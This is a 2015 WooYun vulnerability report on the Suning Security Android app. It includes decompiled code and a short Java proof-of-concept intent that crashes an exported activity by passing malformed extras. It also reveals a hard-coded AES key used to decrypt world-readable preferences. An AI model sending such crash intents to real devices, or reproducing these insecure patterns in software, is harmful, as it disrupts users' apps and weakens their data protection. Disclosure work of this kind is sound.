
Vulnerability summary

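Defect ID: wooyun-2015-0142647

Vulnerability title: A denial of service in the Suning Security app

Vendor: Jiangsu Suning Yigou E-commerce Co., Ltd.

Author: hh88

Submitted: 2015-09-23 14:14

Fixed: 2015-12-22 15:16

Disclosed: 2015-12-22 15:16

Vulnerability type: Denial of service

Severity: Low

Self-assessed Rank: 3

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]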



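Vulnerability details

Disclosure status:

2015-09-23: Details sent to the vendor; awaiting vendor action
2015-09-23: Vendor confirmed; details visible to the vendor only
2015-09-26: Details opened to third-party security partners (NSFOCUS, Tangchao Security Patrol
2015-11-17: Details opened to core white hats and experts in related fields
2015-11-27: Details opened to regular white hats
2015-12-07: Details opened to intern white hats
2015-12-22: Details opened to the public

Brief description:

Android Suning Security is a free mobile security app that combines phone anti-theft, spam SMS blocking and nuisance-call blocking, bringing you all-round ........

Detailed description:

Because the component com.suning.phonesecurity.firewall.NameEditorActivity is exposed: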

    protected void onCreate(Bundle arg4) {
        super.onCreate(arg4);
        this.n = this.getIntent();
        if(this.n.getData() == null) {
            this.n.setData(ak.a);
        }
        this.m = this.n.getAction();
        this.e = this.n.getStringExtra("blocktype");
        if(this.e == null) {
            a.a("NameEditor", "No block type, exiting");
            this.finish();
            return;
        }
        this.o = this.n.getStringExtra(this.e);
        a.a("NameEditor", "mBlocktype:" + this.e);
        ActionBar v0 = this.getActionBar();
        if(v0 != null) {
            v0.setDisplayOptions(12);
        }
        if(this.e.equals(NameEditorActivity.a[1])) {
            goto label_50;
        }
        if(this.e.equals(NameEditorActivity.a[3])) {
            goto label_50;
        }
        if(this.e.equals(NameEditorActivity.a[0])) {
            goto label_83;
        }
        if(!this.e.equals(NameEditorActivity.a[2])) {
            this.setContentView(2130968595);
            this.d = this.findViewById(2131427471);
            this.d.addTextChangedListener(this.q);
            if(!TextUtils.isEmpty(this.o)) {
                this.d.setText(this.o);
            }
            this.j = this.findViewById(2131427474);
            this.k = this.findViewById(2131427472);
            this.l = this.findViewById(2131427473);
        }
        else {
        label_83: // R.layout.activity_number_editor
            this.setContentView(2130968597);
            this.d = this.findViewById(2131427479);
            this.d.addTextChangedListener(this.q);
            this.d.addTextChangedListener(new PhoneNumberFormattingTextWatcher());
            goto label_58;
        label_50: // R.layout.activity_patternnum_editor
            this.setContentView(2130968599);
            this.d = this.findViewById(2131427488);
            this.d.addTextChangedListener(this.q);
        }
    label_58:
        if(!"android.intent.action.INSERT".equals(this.m) && !"android.intent.action.EDIT".equals(this.m)) {
            a.a("NameEditor", "Unknown action, exiting");
            this.finish();
            return;
        }
        if(arg4 != null) {
            this.f = arg4.getString("origContent");
            this.g = Boolean.valueOf(arg4.getBoolean("origPattern"));
            this.h = Boolean.valueOf(arg4.getBoolean("origCall"));
            this.i = Boolean.valueOf(arg4.getBoolean("origSms"));
        }
    }
Of these, the three conversions

    this.g = Boolean.valueOf(arg4.getBoolean("origPattern"));
    this.h = Boolean.valueOf(arg4.getBoolean("origCall"));
    this.i = Boolean.valueOf(arg4.getBoolean("origSms"));

produce a denial of service when abnormal data is passed in.


In addition:

    package com.suning.cloud.push.pushservice.b;

    private b(Context arg7) {
        Iterator v2_1;
        super();
        this.a = new ArrayList();
        this.e = new HashMap();
        this.d = arg7.getApplicationContext();
        b.b(this.d);
        // Mode 1 is Context.MODE_WORLD_READABLE
        String v1 = this.d.getSharedPreferences(String.valueOf(this.d.getPackageName()) + ".push_sync", 1).getString("content", "");
        if(!TextUtils.isEmpty(((CharSequence)v1))) {
            try {
                byte[] v1_2 = Base64.decode(v1.getBytes(), 0);
                // AES key hard-coded as a string literal in the app
                SecretKeySpec v4 = new SecretKeySpec("9876543210123456".getBytes(), "AES");
                Cipher v3 = Cipher.getInstance("AES");
                v3.init(2, ((Key)v4)); // 2 is Cipher.DECRYPT_MODE
                String v2 = new String(v3.doFinal(v1_2));
                if(h.f()) {
                    Log.i(b.b, "init : " + v2);
                }
A fixed key is very dangerous.

Proof of concept:


    public static void NameEditorActivity_poc(Context context){
        Intent intent=new Intent();
        intent.setClassName("com.suning.phonesecurity", "com.suning.phonesecurity.firewall.NameEditorActivity");
        intent.setAction("android.intent.action.INSERT");
        intent.putExtra("blocktype", "whitelist");
        intent.putExtra("whitelist", "xxoo");

        intent.putExtra("origCall", "xxxx");
        context.startActivity(intent);
    }


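Suggested fix:

Add a try/catch.
I'm only here for the "Thanks for the submission; mobile client denial-of-service vulnerabilities are uniformly counted as a 200 yuan gift card."

Copyright notice: when reposting, credit the source hh88@WooYun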


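Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 1

Confirmed: 2015-09-23 15:14

Vendor reply:

Thanks for the submission; please submit security vulnerabilities to http://

Latest status:

None yet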